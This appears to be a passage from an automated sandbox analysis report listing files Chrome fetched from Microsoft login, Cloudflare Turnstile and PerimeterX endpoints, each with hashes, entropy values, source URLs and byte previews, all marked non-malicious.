                                                                                      SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (354), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):354
                                                                                      Entropy (8bit):3.9516830015816824
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:aNBgFtFlU9fZQQ4FN+OZk16rP+Sc4a0vkGSLw00TAEoQekWw3s/7j/XLdBc1diEh:og/FS9yFxxzGT0vPL0M3ewOX3XFMM4
                                                                                      MD5:6C8F6DF4CD77CCE1C4BA1795E44B2AEA
                                                                                      SHA1:BAB398D0618D4D85C60BD42B592161FF168868C8
                                                                                      SHA-256:E077D685DB25475EFD2827C0058C5256A0744FADB333658F112C3E518B463EA3
                                                                                      SHA-512:BE0B598EE35A3C85290FE4B3A911F0FBA6D79BA0763C127E64FF00BAEAA61AFDC8078B91CE9E7DA462690362A685DDDB0D112CAB3859081ACEFDA87C45B15EA7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:3814d48d41c7fada2bd23f3346718b55dead847361355411c1ed1b6d05fd199135d914024e855ee3a3a261d9978db016849ba935796985557158514913af4ba1c0490986e00f1c396c5dfd7d7ce502fad5a9f17219d623cb2ea10693c7cdb1f35b49bc5e41c0e26aabd3731e54f7dcd569df29ba3b544fc9e4699fdd788140bacfb8eb680b146081ad2138464d9acb81b19d45758f2f12913feafd70a5fb863a45398573c9e1f50e4d4a7157977f28dd8e
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                                      Category:downloaded
                                                                                      Size (bytes):122515
                                                                                      Entropy (8bit):7.997419459076181
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                                      MD5:AC9A6ED508328361A4C9530325A94076
                                                                                      SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                                      SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                                      SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                                      Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):31
                                                                                      Entropy (8bit):3.873235826376328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YA8rQaC:YAoQaC
                                                                                      MD5:5FC018D9E6C56911BBC8DC5DDCD0C768
                                                                                      SHA1:70979F57A85D527ED8ABCBF02CFF44640C58BDE6
                                                                                      SHA-256:2E6D78A4AE644F3B60AFD3C33E66539FF6C5F6A8ED6ABC40A3AF06AC020EC020
                                                                                      SHA-512:1E3B86274B3590E28366F2D2DE86A1844058E213BD225AAA05D992CA70523F65D2BD543F9F762A805A2C4D5961AA34F5A19EBE70E135939C9CD3C63F6B5F5524
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"error":"Method Not Allowed"}.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (47520)
                                                                                      Category:downloaded
                                                                                      Size (bytes):47521
                                                                                      Entropy (8bit):5.398500199255723
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                                      MD5:301F68F3D8317AB22D4021E266C9A853
                                                                                      SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                                      SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                                      SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                                                                      Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):20
                                                                                      Entropy (8bit):3.646439344671015
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:xRhVnCm:xrQm
                                                                                      MD5:F79FFC1767406D43B996B050CEC09ED2
                                                                                      SHA1:EA4F919251BCDE6EE3CB2E45C0356E1FA3B86661
                                                                                      SHA-256:1E62D5B3EFE0ECE892FF79BD65457FF2DC48A840444AFD53DEEDF2F2869BD685
                                                                                      SHA-512:1B4C7C09D52BB2D26F505C148FD92B987AD680E675E7496EB8E92279F750587EBCE45DECD718CBBDFB91A4CEAADCA14AD918C4F8AA7971D199593C82C31BB92F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnAwrJpDUzjsBIFDdbBmF8=?alt=proto
                                                                                      Preview:Cg0KCw3WwZhfGgQIZBgC
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 90677
                                                                                      Category:downloaded
                                                                                      Size (bytes):32811
                                                                                      Entropy (8bit):7.992877953733209
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:fDPYSdMWwCyzH8REcKPN/8p0x7UQzlRMXv1FevViDAqA:a8REcsUp0xUQzc/8VCAV
                                                                                      MD5:2E287EB418940084B921590C6E672C9E
                                                                                      SHA1:1FC75A9DAA054EF88AAEA181F3A9B4CBA2B6B6E1
                                                                                      SHA-256:6C2C58DAAE76131A00D1BFEE20852F372CF594BE7F4A8848ACC42F8BF72C1BBD
                                                                                      SHA-512:A77F69571B0F04F4A2354D9E18E41EF86F22274EAED20C02215B632BFEF09C6543A83591E9DB3F2B4036A9684BFF666EB6A7B253BA18893500E9CD541AB752A0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://logincdn.msauth.net/shared/5/chunks/oneds-analytics-js_077217740c853b5d4fe8.js
                                                                                      Preview:...........iw.8.?.~>....%."9K'R...q:.fw.,.n_.Z.l.eRMR^b.O...A.N...yq.t,b!.....BU....4kM.Lr..I.]DE.&..TF..K.J.9.7.$....(..'?....f...tG...?y8~0..;..w;[....;.u........D.......N:W.d........E..eR...q..sJG.O.Z,....l......~.........'.d.......n.N..@.../....l'...".J3Y..n3Y...o..T...P0..j..-.....v.m7T.LM. .....Ev.7...IC.q..[.t>nj.e..OE<m...l)^.K.......8:M.&.]zz*..j.X..K........'3..Tk....Z.2.GQ6..Fi._.|v.Bf.W?...T.]:j(.%F.)..t_^........8.:..DN..8....B.>|<..~..|H.x.q.=-.f.~..{.z..&t...e.LfE,.;.d...n.....2..FH. .Y,.J...EC.cj. .F......o.....\...&\.J..fJiJ.S..4.5..NM]m.....Q.....e.O..iSs'........'Z..6A(Y.8..eQ.....2..I.?...;dS..I...D..@./7t.:z.......c...dF..B.......9...8)..h.........<.I...2.\FY+.=S.8...$Qv...<..IL.x".w9_..3.."-nfR.(..WDN..L.....z..I8.E..Ub......d..M.....sq.N........p.*.lX...A]3Y....j...%.`N..G.v..6.m.KH.M......Z..a2.N.....4....,u.O.vWM...=d..J.r`..b.....N.hzp..C..?.. ......:..M6............;.w.."B.^.ZP.N.:.[..(:...(.y.)q...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                      Category:downloaded
                                                                                      Size (bytes):621
                                                                                      Entropy (8bit):7.673946009263606
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                      MD5:4761405717E938D7E7400BB15715DB1E
                                                                                      SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                      SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                      SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                      Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (2634), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):2755
                                                                                      Entropy (8bit):5.66953907643146
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:t1XXw+kOhX/BxVgnK/Q6GiuGq9juwbae13NhcKBLd4bPfnz+Xar0l9b95DbIIQou:H9W3iuV96wDrHBZ4Lfnz+qol9bTDkn/
                                                                                      MD5:1CC7FDFB8163305D96BC2E659AE56DC3
                                                                                      SHA1:BD0EEA2F6EEEB2C68F6B719FA9F0464060EC8F5E
                                                                                      SHA-256:E929A85BF86CBD4BDA13407981F4AE789FBF9E23024BAD30DD210562F502FB55
                                                                                      SHA-512:0E6E3E509AF5E37EB08F718A4E11C9616E3FCCDF4F142A285B630854BAA8DD9073178047D29E5229A300A3D6ECCD45066242920797886D495D751859CEC17519
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&session_id=4b4b65bbb1a545718e7d4510916c1a9e&id=accd4e1e-f9a3-5e3e-c964-8ed34ebcd823&w=8DD3063C3A8D5A5&tkt=taBcrIH61PuCVH7eNCyH0AHEYHVht29NHm46S5qgUjYH7pfovC%252f8hDcI8ErNjADE9UbWCh2mHpUJ6FPtvbfvmn%252b%252bfaRGbn4CT184m0z1zJ03o99gtLRZiWWJg11sxBE%252b%252f7tdskJnoaMy7jvKS0cp%252bEAAVtFCwlP6wK1aXC8P7ecn46tHcY8gxe7LILrLQCmyFszfdkacLO73D5eg1TVDLtfrmCfzgIrSE3qmItfwk38%252fHK8%252ff4Mad563xPVtg7k0drPmZ%252bdONJ7mrxdcNHsulrClW5qrsTcmKXiG6H3BVVzVxKtOeyxphtOXc3FDDhmO&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d
                                                                                      Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>..</head>..<script>function BaseStamp() { this.GetStorageQsInfo = function () { if (window.localStorage) { var n = window.localStorage.getItem(lsKey); var lsupd = "False"; if (lsupd === "true" && n) { var xhr = new XMLHttpRequest(), method = "GET", url = target + "updatels.html?ofid=" + n + "&session_id=" + sid + "&CustomerId=" + cid; xhr.open(method, url, true); xhr.onreadystatechange = function () { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { var update = xhr.responseText; if (update && update.toLowerCase() === "true") { window.localStorage.setItem(lsKey, id); } } }; xhr.send(); } if (n && n != null && n != "" || (window.localStorage.setItem(lsKey, id), n = id), id != n) return "session_id=" + sid + "&CustomerId=" + cid + "&fid=" + id + "&ofid=" + n + "&w=" + ticks + "&auth=" + encodeURIComponent(authKey) } return "" }; this.newXMLHttp = function () { var n = null; return
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65402)
                                                                                      Category:dropped
                                                                                      Size (bytes):155280
                                                                                      Entropy (8bit):5.668673300904272
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:uGXQR31Vi2YhA+JQmO4qRumgyZ7UKuT6hTTv3/Mdupyrp:uGXQpi2Yu+JjOJZ77uTqPvPMdupk
                                                                                      MD5:8FC14B80771048374013B2950160CDC1
                                                                                      SHA1:7F688A61065605BA0EADA1DEE488A3301E2AAA15
                                                                                      SHA-256:F13C2EA3D976860AB7E9EDCD0C98D2610AFB3D741CED7689D235CDC934597DEA
                                                                                      SHA-512:EBE72F7FEC339D52063F75C21AC11D7092F5E4A1ECF6761ABDEB5E4172C27E39076818B7B33E1E389EC7A79639B09365BEBF3311168C3C9483DEEF79B7144A9D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:// @license Copyright (C) 2014-2025 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed..try{window._pxAppId="PXzC5j78di",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r||"Set"===r?Array.from(t):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1378
                                                                                      Category:downloaded
                                                                                      Size (bytes):628
                                                                                      Entropy (8bit):7.6610853322771
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:X6/EjXb5e1vpPDySPLiDB/3YLZzrlDuLRndk6l3WZi1epo7IyhadSH8Ib1yfuI:X6cP5e3dgYLMk69Ii1epryt/Md
                                                                                      MD5:6F68E9881DF18F8E251AB57D5786239B
                                                                                      SHA1:C0F7A01A288752833390FC330995F25488BCE8EC
                                                                                      SHA-256:B33E30351B2F4EF67D53D2C6DBE189A4D572425037E4F1264A0190DC4A820845
                                                                                      SHA-512:B33DFF67480DF940FA0565B231E02F26840DCB5135A4A2FF3C310AA062D3D4B456FA9C8C6E2BC59EC76B515EA1B36D574A5701771BCEE7CEE97B99EF60A803C6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_account_aad_a8332c62695d74843a11daf39a74e552.svg
                                                                                      Preview:..........m.Mo.0.....]%F..6...rX.;..&i..].&HZ...#%...B..4.W$.....>....v8...f....g.O/.3k....ms.o....m...a8.......u..4>.]....r~8...%.....x.m.y].....u.>..7....l.]....i..fC.[O..z.)..r..........g!(.+....4.P9.0@.......R.......^q.I[..7.....Q;...6.N....a.d.%....:...6FE.}.......}s.`LV..Q.U. 8..}..y.&..I..a.\.8%..kgoo.Q6...>.5.8..!.....".t9].v.B) `.G6.V.E\..AJQU.7...J.oS.*........*.*@......l.....{.r..KP@......9YD..U......&..:..d......+/...(..:.S_...S......n..z.a...,.,&VB......eJR)...R.H3])>....9O.........KDi.O..#...-?D.1*..N.p....h.#.Z.[/..!.h..$..S..Phdqd....}.....E>g..q5..J.T......u.....i.b...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (354), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):354
                                                                                      Entropy (8bit):3.9581384037731593
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:q13cHEo71Hd9jNq3TIAfzA1xASjt9NST24dSFVxAcMczTW9QEfKGomVHabv:Ms5B99j6s0zA73g24uVxAcMiW9tKGomA
                                                                                      MD5:89469077AB9F97A6D588641A894ABDE0
                                                                                      SHA1:46A9FE6B43F5E754069538B0F8B640B2DDAFA24D
                                                                                      SHA-256:40CD367B0B7048014E4A8E943BE32F7B271B6DEEFC0FEDDFE62F443027AE73CF
                                                                                      SHA-512:E6AF144996C64C71C0B78D7566127EBED8152CF09DAC8CAE0FCABF12DA2BACDDE73D019300D5DBB6C0250CE977269A89B3615B74D080EAC4488137FCDB12965C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://stk.hsprotect.net/ns?c=dfd0a870-ce3f-11ef-ae3b-e12a94f7ceb6
                                                                                      Preview:8268665732f2a5e90bdb732680de8a7b950fb5053e0859334f1fa356b2aa8bbbfbb380949711401a358d3dadda2c1419695a69bdc120f717e4dedf9affba26363768656848230756450843278fb7280d59e8f05f67f4e5b7b371a2234201769d56b59d758ab5a2cdfce6b48e4bc7703258eed7447676ff590bf915386307e0987a01b296976297375d6337a6f43789eb7c6e1ecd1e781e354870a37d96d5c8d8fc8af06d5ae7fc1c1700081a24578a2f85
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 907107
                                                                                      Category:downloaded
                                                                                      Size (bytes):229026
                                                                                      Entropy (8bit):7.998665438846639
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:LuN7ytq45NtpSvNkFqnsj9N+EFnTvrOFo26Y7e:LQ7ytq4FpSVnaSEFnTzE7e
                                                                                      MD5:BBB4833A92B71888046CB504CB918E34
                                                                                      SHA1:EAA61E72A7E73A9A06410D7FEC711109DA450971
                                                                                      SHA-256:396985CBEE440C8805563B3F11820C2544141AA14E2CC39C63CD31107C8D2B8F
                                                                                      SHA-512:AB0C2E3DD1ADF5BEE0A3AF5F4BDAA044EEEB1F2ACC8F2FA48630356788014377FC66BF5D4AB0E3E52656E4A7BE3291A412BC79381356718C480ED96B08F9AA65
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://logincdn.msauth.net/shared/5/js/signup-fabric_en_sDUXQ0TraKFnDUxJlOs4Gg2.js
                                                                                      Preview:...........iw.8.(.....n....dg...M....l.'.N.}}h...H....8.....+E9.g.g.{&...A.K..T.j..........r#.Fy1K.4.6.S.@V)..:...QrV..S..?......^..../...o....E6....<)6..D&...4........*.j-...j.Z=....`...n(..j0I...<.....\..fG..s.^..(YL.7E>..O..W...e..V....\......E>;(..X..|7K.....e:Pq.8.L.:.....U^.'.,L..b...*.!....$..u...G<..<).w...o..j...1.dxU.jQd.E;-_.Y.Y.$...n...:_N..6 .ER.....BfC.._..t...&O.p.._.}........JdQ]...Yy}..|.....G...|Z.a.......1rJ...z$.:.L]O..y^Tel@(.B..*..-D.l...4..e.yQ..(..^...o..xk.?...%.M....om.I.....I..!/.{...,4..A....d.....Q.f$.moO...89...... =>..+...J..f..nmM!.....0..Y.....u&..%t`0...%.SXR-.bo..}oA...M.W..t~+...I..j....h..,....m.T.J.e..RB...^..b.u.ql.7u..y_.-2..li......`.`K+..1h.2...S....F.:.....M....*t....B.".;u.u.T.g.t...*.@..[-.Q.{......b..P..<...TL..2...K%.e6p:....]S.`Q..S..G..].#Ur..v#x...OBUl...M.N.i.....Tv....8k,2M.^."..ec..i>..Z...a..a.8...{_\4.,d9.33k...y...+U..vU..u..]N.# ~..bk+[L...$.)UlO.^y..^.;...<R...a..?..g.?..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6
                                                                                      Entropy (8bit):2.584962500721156
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:fCu:au
                                                                                      MD5:AAAB7A355103063D9EEB4824A3A6B374
                                                                                      SHA1:E51555F02C32321F3E48F07A0FA5AF46DF835BFC
                                                                                      SHA-256:79BA862622D6FA84AC7E4F98EB95043A255FC2C81711E9400A8AA4D4B1608471
                                                                                      SHA-512:D1A0C9C4F628459F5CA904405B2A66A69425A50E8DCE1BAA43161D784EB219BD3E1FD9447BCBACC314652EDA08CF0B02C863C87F3AC1534AE0F62A414C191F1B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:dfp:OK
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                                      Category:dropped
                                                                                      Size (bytes):122515
                                                                                      Entropy (8bit):7.997419459076181
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                                      MD5:AC9A6ED508328361A4C9530325A94076
                                                                                      SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                                      SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                                      SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 2 x 37, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):4.035372245524405
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:yionv//thPlteCY5pBxl/k4E08up:6v/lhPGCcB7Tp
                                                                                      MD5:9519C5C86B3BC91B3D6623DC2213B2C5
                                                                                      SHA1:FA4E2E348FE6CD3B27412E85BD55399D7799A1B5
                                                                                      SHA-256:581C47F1C63C215848867F3B9B725F71D8870695723CCC0DD9D80C99B8187C3C
                                                                                      SHA-512:4F315374CDE2BDF219CAF4F32F344B15013D06FF7DBD8B2BCD6A2A89242AD80C31624B22A2ED349A403E46C835F0C8212B3E68385C9B6D30B64289D8ED1ABA7C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.PNG........IHDR.......%......}......IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 4730
                                                                                      Category:dropped
                                                                                      Size (bytes):1665
                                                                                      Entropy (8bit):7.865599708484188
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:XyBkuFl+zM1O5UGTtXFpgBY6rUheWMwEX6uIuL4DpvlZndrTCs:CBPIMGUG2BraMd74DptTrus
                                                                                      MD5:7F8CFCD63635E2332715FA8A476A9106
                                                                                      SHA1:BC6250B209D55688BCFBB45A5CFB935ED51C4A95
                                                                                      SHA-256:00D524C1675CF218207723DD22BDC884FB7E0AD30BB555D6FCDEA4D828771E70
                                                                                      SHA-512:EEA2C815E30B1729B02BED41800D4002D176A4FA84157FE50BFB0EBFAB40F57C3D380D1956CAA317B3F18B0A4555AAF067E446D15D584D5FE4A4D036389DC9BF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........W[o.6.~.`...$.r.[.h.tI.4F.u....(.f"..I.......c9N....a.b..|...R..[..k...u{..{....]......}......qj.{c..E..3...Hp$$b.....5U(.O.p..R.H.)J...D+.1.A).......!.`.g.S..>.kl.8h.....X#.4#.a.Zk.......T..1:gD.%..IJ(.....z....HQ..B......F2.....Ge.....`ph..O....1I!h.#x4.W@,...E.H.4.i..1..G...+..?...aJ._.SQ91.......&K...% ....I.M.swP8<...k..G.j0C,N....ETi.$42...LQ?o..n..u.F.R.Z...{^.V^l..NT.R.1=N......t.a...-..V>v/>{7j..i..... @."..:..?+d..g.......7,?N>..(;.=*.JS.C.)..Ln?B..........j\..j._..{.fk.rb.*i...|?...6+...G..bx.]..j.2.l....c..]..or[(,.%.6.wY[..k.1....~*.s./..t.+5....f......w.L...F.m..I.Y..K.2 ...+<..1p(4......s..Qm.K.|.n..R....~..r..[.W.~G....*..X......s.%n.1._$....tx"8.I....p..D.J...j/.r.)`..mo.....<.EH.V.j....[...B.g.....Ak+......Ar...!..@)..wF.h...A..4J.....].'..VF....."... .'w..*..Uu^v....f.j.sw.........8D.4..b<...@z..`BD....? {$ A.......=.j...f.Z.V................:..7........B<l4......jb|AA.....5....g..Lm..m...H....l.X.^t.).0..D`....
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:downloaded
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
